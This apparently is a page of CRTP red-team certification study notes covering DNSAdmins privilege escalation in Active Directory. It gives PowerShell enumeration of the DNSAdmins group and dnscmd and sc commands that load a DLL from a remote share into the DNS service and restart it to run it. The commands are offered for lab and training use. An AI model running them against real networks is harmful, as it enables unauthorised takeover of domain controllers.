CRTP Certified Red Team Professional
AuthorDiscordHTB Pro LabsHTB CPTSHTB CDSA
  • πŸ‘¨β€πŸš’Certified Red Team Professional
  • LAB Access
  • πŸ”₯Assume Breach Execution Cycle
  • πŸ˜†Prepare your VM
    • πŸ˜…PowerShell Detections
    • πŸ”₯AMSI Bypass
    • πŸ™ƒTools
    • CMD Commands
    • 🀣Escape the Machine
  • Data Visualization
    • BloodHound
    • AzureHound
    • RustHound
  • Domain Enumeration
    • 1️⃣Tools
    • 2️⃣Domain Enumeration
    • 3️⃣Users, Groups, Computers Enumeration
    • 4️⃣Shares Enumeration
    • 5️⃣GPO Enumeration
    • 6️⃣ACLs Enumeration
    • 7️⃣Domain Trusts
    • Domain Forests
    • 9️⃣Miscellaneous Enumeration
    • User Hunting
  • Local Privilege Escalation
    • Theory
    • Automation Tools
    • Techniques
  • Lateral Movement
    • Thinking
    • WinRS
    • PowerShell Remoting
    • Invoke-MimiKatz
    • CrackMapExec
  • Domain Persistence
    • πŸ”₯Golden tickets
    • πŸ₯ˆSilver Tickets
    • πŸ’ŽDiamond Tickets
    • πŸš’Skeleton Keys
    • DSRM
    • Custom SSP - Track logons
    • ACLs
      • 1️⃣AdminSDHolder
      • 2️⃣DCsync
      • 3️⃣WMI
      • 4️⃣Remote Powershell
      • 5️⃣Remote Registry
  • Domain Privilege Escalation
    • 🟒Kerberoast
    • 🟒AS-REPS Roasting
    • 🟒Set SPN
    • 🟒Unconstrained Delegation
    • 🟒Constrained Delegation
    • 🟒DNS Admins
    • Enterprise Admins
      • Child to parent - Trust tickets
      • Child to parent - krbtgt hash
    • 🟒Crossforest attacks
    • AD CS
    • 🟒Abuse MSSQL Servers
Powered by GitBook
On this page
  • Enumerate member of the DNS admin group
  • From the privilege of DNSAdmins group member, configue DDL using dnscmd.exe (needs RSAT DNS)

Was this helpful?

  1. Domain Privilege Escalation

DNS Admins

Enumerate member of the DNS admin group

Get-NetGRoupMember β€œDNSAdmins”

From the privilege of DNSAdmins group member, configue DDL using dnscmd.exe (needs RSAT DNS)

Share the directory the DLL is in for everyone so it's accessible. logs all DNS queries on C:\Windows\System32\kiwidns.log

Dnscmd <dns server> /config /serverlevelplugindll \\<ip>\dll\mimilib.dll

Restart DNS

Sc \\<dns server> stop dns
Sc \\<dns server> start dns
PreviousConstrained DelegationNextEnterprise Admins

Last updated 2 years ago

Was this helpful?

🟒